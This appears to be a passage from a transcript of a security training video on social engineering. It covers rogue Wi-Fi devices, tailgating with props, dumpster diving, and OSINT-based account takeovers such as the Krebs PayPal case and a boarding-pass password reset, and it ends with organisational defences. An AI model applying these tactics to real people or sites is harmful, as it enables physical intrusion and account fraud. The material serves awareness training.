that people will either see and consciously connect to because I've called it free Wi-Fi or
something, yes, and that again is social engineering because I'm tricking people into thinking
that they're going to get free Wi-Fi. Which they may get. We'll put it this way. They will get
something. They may actually get a connection which seems legitimate. That's what I mean,
yes. But it's all going through this device and I'm able to log all the traffic and modify any of
the unencrypted traffic. Of course, I can log encrypted traffic, but I can only read unencrypted
traffic. Yes. And it's also particularly malicious in that it can actually rebroadcast the network
names that the device was previously associated with, in which case the device that someone
might even not take out of their pocket can actually associate with this and then start sending
all the traffic through. This is also from the same guys, a company called Hak5 who make the
Rubber Ducky and the LAN Turtle and the Wi-Fi Pineapple, which is kind of neat.

How Social Engineers Gain Access

But I think one other thing that we should talk about while we're here as well is when we're
talking about the LAN Turtle, we said, look, someone might actually plug this into the back of
a machine in an organization, but of course to do that, the social engineer in these human-
based social engineering capacities has got to get on site. Yes, physical access. They've got to
be able to get physical access and of course, you've got to plug that into a machine, so it sort
of raises the question of how are we going to get the thing on site? So as a social engineer,
how are we going to gain access to the premises and I thought what we might do, because
this is a good forum for play-by-play, a good structure to do it in play-by-play is we might get
up and move over to the door and I'll show you how we might get someone on site. Alright,
sure. Alright, so I'm hanging around outside a place of work which I would like to gain
access to, me in my social engineering capacity. You are a victim employee of the workplace
and you're going to walk through the door. Now let's see what happens when we do this. So
you're off on your way to work. Yes. Alright, so that's just a really simple case or example called
tailgating, so I'm following you through. That made me feel suspicious though, like what?
Well, yes and no, because you've got to remember most people would like to be polite and
hold the door. That's true and if it's a larger company then you might not know everybody
that works there anyway. Yes, right, because do you really feel compelled to effectively slam
the door in someone's face? However, you did look suspicious, so let's level up. So here's
what I'm going to do. I'm going to take a prop. Alright. You have a box. Gee, this box is
heavy, can you grab the door for me Lars? Ah, yeah. Thank you. Alright, so we're laughing
because it is insanely simple, but the very fact that someone is there struggling with something
makes you even more sympathetic to their cause and wanting to help them get through, and
there are lots of little sort of tweaks like this which tend to happen with social engineering, so
that's one of them. The other is, would you feel more inclined to let me through, or would you
be less suspicious if you saw me on site, if I was wearing a high-visibility vest? I was just
thinking disguise. Maybe a hard hat, because no one sees the guy in the high-visibility vest,
right? That's true, that's true. So things like that, these are all ways of getting on site and then
when I'm on site, then I want to use things like the LAN Turtle or I want to do stuff like go
through your garbage bins, because there's a lot of stuff in dumpsters. This is the whole idea
of dumpster diving. I go through and I pull stuff out of the rubbish bin and there's personally
identifiable information, sensitive info, company negotiations, things like that actually on
premises, but that again is very much human-based social engineering because I've got to be
on there, on the place of work and basically ready for people to come up and challenge me as
well. So what you're saying is that companies actually need to educate their staff? Yes,
absolutely, and the education needs to be, look, it's not an offense to possibly say to someone,
you know, who are you? Are you the person who should be in here? And many companies
will implement things like security gates where you will have to go through one by one; you
simply can't push through together or it would look really suspicious. Oh, yes, well, and that's
probably true for companies that have something to protect that they know someone else will
have, but I'm thinking in terms of the box example; that could be any company. Well, the
thing is that every company does have something they want to protect because at the very
least, every company these days is a network and attackers want to get in and plug something
into the network so that they've got the system control. Every company has, like I mentioned,
trash cans. They have things in the rubbish bins there that attackers would like to get access
to. Yes. How many times have you been in a company and walked over to the photocopier?
Well, don't you? That's interesting. I wonder who would leave that there. Or the printer, wow,
they're just pumping stuff out and now it's just sitting there, so having access on premise can
give the social engineer some very valuable info.

Social Engineering Reconnaissance - Open Source Intelligence (OSINT)

Okay, so that was in-person based social engineering. Of course, the last thing we did is the
door trick to get you on site. Right, I can see how that would work, actually; that's interesting
in a practice run. Yes, oh yes it happens, but maybe what we might start to go to now is how
attackers in a social engineering capacity do reconnaissance and they particularly do a lot of
reconnaissance via what we would call OSINT or open source intelligence and there's a lot
you can do with OSINT; there's a lot of information you can find online so think about the
amount of sort of digital footprints, if you like, that we leave all over the place. So you know,
particularly in this day of social media, we have a huge amount of stuff on our profiles. You
and I are both on the other side of the world. For us at the moment we've got social profiles
that advise that, they know which airlines we've been on, you could figure out which flights
we've been on, which airports we've gone through, lots of information out there and what's
interesting is the way this OSINT information starts to get used in attacks and I brought up one
on the screen here on my PC here from December 2015 and this was by Brian Krebs and
Brian Krebs is a really, really well-renowned security journalist who writes fantastic stuff and
what was happening here was Brian's PayPal account kept getting compromised and the way
the attackers were compromising his account is they were using information which was
effectively sourced from OSINT sources, information such as obviously his name, his email
address, his home address, as well as other sources of information or pieces of information
which had been broadly distributed about him. So they had his social security number, which
as much as people like to think is a sensitive piece of verification data, it gets shared
extensively and the point is, is that this information which was retrievable via open source
intelligence sources, is all the attackers needed to verify themselves to PayPal and add
an email address to his account and basically take over his account and they kept doing it
again, and again and again. So Brian would figure it out and he'd change the email address
and then they'd just call up PayPal again and go, hey, it's Brian, I'm locked out again, here's
my information, can you let me back in? Yes, right. So, well, that could happen to anybody.
Well, it could and what's really interesting about this is the way we see organizations
verifying people based on data which is retrievable via OSINT sources. So we've seen other
cases where other really big, well-known brands have verified people based on pieces
of data such as the last four digits of your credit card. Now curiously, the last four digits of
your credit card are exposed in many, many different places. So you'll see them on receipts
very often, yes, which would be in the trash can, which comes back to the dumpster dive
example just before. You will see them in many data breaches, even where the organization is
PCI compliant. So PCI being the Payment Card Industry; they say you cannot store full
card numbers, but you can store the last four digits, because you can't defraud the card, but
you can then call up many different organizations and say hey, here's the last four digits of
my card to prove who I am. We've seen other organizations do things like, they won't allow
you to change your password or do anything like that unless you can give them the last four
digits of your card, but they will allow you to put a new card on your account if you have
address, email, phone number, which is retrievable via open source information, and then you
call back the next day. I was going to say, then you know the last four digits. And you go, so
I've got this card on my account, because it's the one I put on there yesterday, right? And then
you have control of the account. So it's really interesting to sort of see how useful this open
source intelligence information is and just how readily available it is. Wow, yes! So let's pick
another example there and in fact, I did a demo at the NDC conference that we were at, or the
one I was at a couple of years ago, and what I showed was what you could do with the
information that was on people's boarding passes and I had a friend who took great pleasure
in announcing to everyone that he'd been upgraded to first class on a particular flight. As you
would, you know, it's probably not uncommon. I understand the temptation, but Lars, don't
do it. I'll tell you why you shouldn't do it. Oh, I travel on first class all the time. What he'd done,
well, don't post your boarding pass; if I see you post your boarding pass, I will do this. So
what he had done is he'd posted his boarding pass, so a photo of it, a very, very clear, perfect
picture, which obviously includes the flight, the airline, his name, his frequent flyer number,
and what that allows you to do is that is enough information to go to this particular airline and
reset his password. Because what you can do is you can take the name and the frequent flyer
number and you can find the other pieces of information via open source intelligence. Now if
you can find that information and reset his password and if you, hypothetically, were to keep
flying first class and send photos, I would be very, I mean I wouldn't do this, but I would be
very inclined to go on, reset your frequent flyer password and then ask to be put as far down
the back of the airline as possible. You wouldn't do that. Only in travel, but I would do it. So
this is the thing. Look, this is open source intelligence information. So I was, once he put it
on social media and it became so readily available, it effectively became open source
intelligence and that would allow you to take over the account. Now the question of course is
for the likes of the airline involved. Is there enough control if someone can just take OSINT
data and actually take over the account? Yes, they might not know or it's the whole question
of you know, at what point does it become open source, because I would imagine that people,
if they put it on Facebook and they put it so that only their accepted friends can see it, they
would think it's less visible and less global. Keeping in mind that I am a friend, you know. I
know, well. But what was he expecting me not to do? Yes. But look, it does of course depend
on how broadly you socialize it, but you've also got to make the assumption that once you
start putting things on social media, it is almost as good as public and certainly we've seen
many, many cases where people then re-shared things that people have shared on social
media and it's gone out beyond the original scope of what they conceived it was. Absolutely,
and it's the whole thing of if you put something on the internet, you know, it's there forever.
Yes, pretty much and of course, we say this even when you're creating accounts and things
that you expect to be private, but you have to sort of work on this assumption that at some
stage that might not be. Now of course in a case like that, if I was the airline, I would be
wanting to do things like, if we're going to reset passwords, let's at least maybe send the guy
an email. Yes. Okay, you've got to be able to receive an email and even better, if it's
something as critical as the password of your frequent flyer account, which controls your
travel plans, maybe an SMS as well. Yes. Now that could be difficult because the guy is
traveling around the world and he may not have access to SMS, but there are various other
channels that you can use which work on the assumption that there is a lot of data available
either publicly or almost publicly, via social media, and you've got to be resilient to the fact
that an adversary could get hold of that. Yes, true, but there's also a case here where it says,
well at what point is it no longer the company's responsibility to babysit you? Yes, look,
there's a bit of a due diligence question there, right? So was there sufficient due diligence on
behalf of the airline in order to keep your information safe? But the problem is, when it
comes down to just a frequent flyer number, one of the things I noticed actually for this
particular airline, in the past they had sent me baggage tags which have the frequent flyer
number on them. So, you know, now we're talking about okay, my sort of access to
information is if I could follow someone on the plane and they've got the bag over their
shoulder and the frequent flyer tags hanging off and I can see what ultimately is like a 7-digit
number or something, which would be hard, and often has their name and their phone number
on it as well, so you see here, you're ticking off the boxes and this is what an adversary wants
to do. They want to just start ticking off the boxes of all the pieces of information they can
find and they will go to multiple different open source intelligence resources to find that. You
know, if you had someone's frequent flyer number, let's imagine, a hypothetical. You follow
them on the plane. They've got the baggage tag. You've got the frequent flyer number, you've
got their phone number, you've got their name, you also know the flight, and you also know
the airline. That's a lot of information. That's going to be enough to then have a pretty good
chance to start to get more information about them such as what is their LinkedIn profile?
Now I know where they work, now I know what their role is, you know? Now I know who
their associates are and you start pivoting through and finding more and more info like this.
Maybe they've got domains registered in their name with public WHOIS records which also
have a home address which is as good as public anyway, but you just start to fill in all the
gaps. I get, yes, I see what you're saying, but there's also the part of it that says, well, you
know, we work for ourselves, we are relying on people knowing who we are and being able
to contact us, so we want them to know certain pieces of information, which may be what
you're just alluding to now is what they need, so you know, how do you project yourself?
How do you? You can't just go offline if that's part of what you do. Well, you know, there's
got to be some pragmatism here as well. I think you saw something I wrote very recently
where one particular company that I was having a public social media discussion with, then
said, look, you might want to delete that Tweet, it had your email address in it, and I said to
them, yes, that's how people send email to me. Like they take the address that I share publicly
and they send it to me, and look, as you say, you and I probably have a greater tolerance for
sharing information publicly, but I suspect what's a bit different between us and the vast
number of people is that we've got a probably better awareness of what information is public
and it's a conscious decision, understanding the risks, but I like the idea of always working on
the assumption of not sharing anything that you don't have to and that it will at some stage
become public.

How Do We Protect Against Social Engineering?

But I think maybe the bigger question we should address as we start to wrap up is for things
like organizations, okay, for entities such as organizations, how do they protect from a lot of
these attacks that we've looked at? Because we've looked at things like phishing attacks, for
example, and that can really bring an organization undone very quickly, and it does come
down to training. So how is the organization going to train the people? But the training that
we've seen in many organizations will consist of a number of things. There will be posters. So
every time you get your cup of coffee or your tea, you will see a poster which says, don't
share your passwords with other people, and it just becomes this white noise in the
background. You go, yes, I know that, and then you go back to normal life. It may also
consist of once a year you will sit down and answer a questionnaire which effectively says,
you know, Bob has just called up and Bob has asked you for your password; should you give
Bob your password? No, and then you get back to life very quickly and you forget the whole
thing. What I really like is the companies, and there's a company called Phish5 for example,
which does things like it will run phishing campaigns within your organization. I actually
have an example because I used to work for a company that had a security expert; part
of the services that we offered was pen testing, penetration testing and the bosses at the
time decided that now we're going to pen test ourselves. So they got this guy who is a
professional ethical hacker, as it's called, and he engineered, or did a social engineering attack
on the staff in the form of sending us a LinkedIn message that then said something that was
very legit and it came from the directors and said, please click this link and then a week later
we were then all, you know, we all got the presentation of what information was collected. It
was very, very powerful because you have no idea. I think that's really good on a couple of
fronts. So number one, that would be typically what we call a spear phishing attack. Yes. So,
yes, phishing is what I've got in my mail. There's a million people who just got the same
thing that we looked at before. Spear phishing is very targeted to the organization or to the
individual and it will normally represent information about that target to increase the
authenticity of it, and massively effective because they're very hard to identify when they're
done well. So yes, that was the first thing that resonated with what you just said and I think
the second thing is that exercise was run and I bet it resonated with people in a way that
posters just never do. Oh absolutely because it came as just something that wasn't the
company; it was your personal LinkedIn inbox. Right, and that was very targeted. So that
actually targeted the LinkedIn account of the people in the company. Yes, of each person in
the company. Which would be easy to discover because you can go to LinkedIn and you can
search for everyone and I did this just recently, ethically. You can go and filter down and just
say, give me, for example, all the system administrators within a particular company. Yes,
well, and you can pay for certain levels of access to the people in a certain company and you
can send them direct messages as well. It's not difficult. So conditioning is really good and I
think for anyone that's in an organization and they're conscious of the risk of social
engineering and they're wondering how do we actually help the organization move forward?
Focus on conditioning rather than the tick boxes. I understand why they need the tick boxes;
there are often legal reasons and things like that, but nothing works better than people
actually falling victim to a social engineering attack, done in an ethical way and you know,
the penny really drops there. It was very powerful and I left the company, but I know they've
done it since again, in various different ways. And that's another good point there, too. So this
is not, let us do it once. No, no, not at all. This needs to be continuous and of course, it's
something that you really want to indoctrinate new hires into as well and they don't have to
be expensive, particularly the stuff like Phish 5, I mentioned before; it's not expensive to run,
you just set it up and you run the whole campaign yourself. So just before we wrap up, how
do we summarize this in terms of what, as if you're a company or you're an individual, how
do you get ahead? Like, how do you, how do you mitigate the social engineering that
invariably is going to happen at some level, I would have thought. I think the first thing is
recognizing that social engineering attacks are enormously successful. The success rate of
social engineering attacks is really, really high. So much so or so much more so than so many
other sort of traditional IT-based attacks against systems. So that's the first thing and then
obviously as individuals, learning what those sort of call signs are. So you know, we spoke a
lot about human weaknesses earlier on, so thinking when there is a request for information,
are they trying to exploit a human weakness here? Is it, say, fear because they're pretending
to be my boss? Is it greed and they're offering me something that I'd really like. You know, I
guess having a healthy level of suspicion without becoming too paranoid about life as well.
Absolutely. So that's certainly very important as an individual. Obviously, all the sorts of
good practices that we'd like individuals to use around things like the way they create and
store passwords as well is very important. It's very, very hard to socially engineer out of
someone a massively long, generated, automatic password that's only auto completed into the
legitimate site by a good password manager. And the user doesn't even know it. Yes, exactly,
so you know, that's a good example on the individual level. On a corporate level, recognizing
again that the prevalence of this risk and that humans are often what we refer to as the soft
scent within the hard shell, right? So we have these organizations with firewalls and, you
know, all sorts of network devices and intrusion detection systems, we have an electronic
system such as anti-virus and you know, a lot of things there that operate at a digital level and
then we've got these vulnerable soft matter people like you and I, sitting here controlling the
machines. Letting the guy come in the door. Letting the guy come in the door! I mean, that is
just perfect. How much money goes into securing networks and then you let me through the
door because you're being nice. You know, so recognizing that that happens and I think
again, the big thing for organizations is working on the assumptions that the humans are
compromised, yes? So for example, let us apply the principle of least privilege. Let's ensure
that people only have access to the things that they need in order to do their jobs. Someone
told me a story the other day. They said, they used to have a manager who said that because
he is the manager of the people, he should have the rights of everyone underneath them
because he can tell them what to do anyway, and he had that and then his 5-year-old son
came in and played with his computer. Yes. And it's not necessarily that you expect the
humans to have malice, okay? No, no. Okay? It's not that they're setting out to be evil, it's that
they can be coerced into doing things that they didn't intend to do and if they don't have the
access to systems, then they can't get anything of it. Now you give them what they need,
right? But you don't give them anymore. Yes, absolutely. And I think finally, that point we
touched on just before about training, so let us train the humans, but more specifically let us
condition them. So let us, make sure that they experience this. Yes, and don't just do it once.
It's a continuous educational process. Make it ongoing. Make it part of the process, right?
Part of the psyche of the organization and if you make it boring and if you make people just
sit there through endless videos and just fill out forms, it really not going to resonate with
them. No, they just want to get through it as quickly as possible. Well look, I think on that
note we've pretty much solved the world's problems in terms of social engineering.
Absolutely. So hopefully, if individual pick that up and organizations pick that up, this will
become a much smaller thing than what it is at the moment. So thanks very much, mate. I
think that wraps up another good play-by-play. Absolutely! Thanks very much. Very
educational. Good on you. Okay.